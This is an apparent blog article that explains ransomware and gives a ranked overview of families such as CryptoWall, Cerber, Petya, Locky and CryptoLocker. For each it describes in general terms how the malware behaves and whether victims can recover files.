Ransomware is computer malware that installs covertly on a victim’s computer, executes a cryptovirology attack that adversely affects it, and demands a ransom payment to decrypt it or not publish it. Simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, and display a message requesting payment to unlock it.
Ransomware is difficult to stop even for Windows computers running antivirus although that is improving. The only defence is backup but even that can come under attack from ransomware if it is reachable from the infected PC. Longer term, ransomware will inevitably fade but extortion malware could move to the next tactic of threatening people with exposure for non-existent crimes such as downloading child abuse images. With more SMEs being affected than ever before, this threat has a way to run yet.
Here is a list of top 10 different types of ransomware attacks :
With Locky and Cerber, CryptoWall is still the most common ransomware threat. Produced in several versions since at least 2014, version 4.0 has been distributed since late 2015 using the Angler exploit kit, CryptoWall feels like a mature piece of malware right down to its attempts at persistence and process injection. Little things stand out such as the way it makes every encrypted filename unique to make it more difficult to understand the damage. Recovery? No.
8. Cerber – ransomware-as-a-service
It is one of a new breed of what appear to be ransomware-as-a-service applications. Encrypts files, of course, but not in Russia or former Soviet republics which might be a clue to its Russian origins. Once infected, PCs throws up fake Windows system alert, instituting a reboot before starting it encryption routine. Rubbing it in, Cerber even institutes the PC to speak its ransom demand in case the victim doesn’t notice the dropped text files. Recovery? None known
7. HydraCrypt – ransomware can be beaten
Offshoots of the CrypBoss ransomware, Hydracrypt is notable for being pushed by the highly-active Angler exploit kit that suddenly and mysteriously disappeared in June 2016, HydraCrypt is possibly famous for the battle between its creators and a researcher called Fabian Wosar. So far, Wosar is winning hands down, having released decryptors for successive versions of this family. Recovery? Yes.
6. Petya – attack the PC too
Ransomware usually encrypts files but Petya’s target is the system itself. Its first act is to overwrite the Master Boot Record (MBR), causing a full blue screen of death crash. When the user reboots instead of Windows they see a skull and crossbones splash screen with a ransom demand. Effectively, they are holding hostage the files and the entire system by encrypting the Master File Table making the files inaccessible. Recovery? Possible
5. PowerWare – PowerShell hijacker
Discovered by security firm Carbon Black, this one is interesting because it is aimed at business using Microsoft Word and the PowerShell scripting interface. This malware’s innovation is that it after tempting the user to enable macros to view a booby-trapped Word attachment it runs without files, hooking PowerShell to download a malicious script. Writing no files makes it hard to detect its activity when it encrypts files. Recovery? Possible says Carbon Black
4. zCrypt – ransomware that behaves like a virus
zCrypt tries the unusual technique of spreading as a virus. This means that it doesn’t rely on malicious emails to find victims and can spread on USB sticks. Creates a custom autorun.inf that allows it to execute automatically when it is plugged into a second machine. Instead of automatically encrypting all the files it can find it simply detects important directories and encrypts files that are changed. Scrambles files first to make recovery impossible.
3. Crysis – Locky copycat with big ambitions
First detected by ESET in early 2016, Crysis styles itself on Locky in that it encrypts shadow copies and every file it can find including in some cases system files. This rather odd behaviour means that the infected PC can become inoperable. Attempts to elevate its privileges to admin level by stealing available logins and even steals files, including user credentials. Targets VMware virtual machines. Recovery? ESET has a decryptor for early versions.
2. Locky – well engineered, ruthless, clever
The work of the criminals behind the Dridex botnet, Locky is as bad as ransomware can get. Locky’s creators seem to have thought of everything, not only encrypting a wide range of data files but even Bitcoin wallets and Windows Volume Snapshot Service (VSS) files in case users try and restore files using that. Reaches out to attached shares and even other PCs and servers. Uses strong encryption and has found several high-profile victims. Recovery? No.
CryptoLocker is long gone (downed by Operation Tovar in 2014) but it deserves infamy because its heyday of 2013 proved to cybercriminals how successful ransomware could be. It was supplanted by the equally vicious CryptoWall, which remains a headache to this day on systems not running updated AV or endpoint security. A long way behind state of the art but it doesn’t need to be. Recovery? No.